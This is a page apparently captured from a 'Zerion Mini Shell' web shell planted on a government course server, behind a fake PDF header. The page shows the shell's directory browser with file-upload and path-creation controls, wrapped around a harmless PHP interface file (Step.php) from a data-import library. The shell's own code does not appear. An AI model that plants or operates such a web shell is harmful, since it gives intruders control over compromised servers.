%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/cursos.tjamich.gob.mx/vendor/ddeboer/data-import/src/
Upload File :
Create Path :
Current File : /home/tjamichg/cursos.tjamich.gob.mx/vendor/ddeboer/data-import/src/Step.php

<?php

namespace Ddeboer\DataImport;

/**
 * @author Markus Bachmann <markus.bachmann@bachi.biz>
 */
interface Step
{
    /**
     * Any processing done on each item in the data stack
     *
     * @param mixed &$item
     *
     * @return boolean False return value means the item should be skipped
     */
    public function process(&$item);
}

Zerion Mini Shell 1.0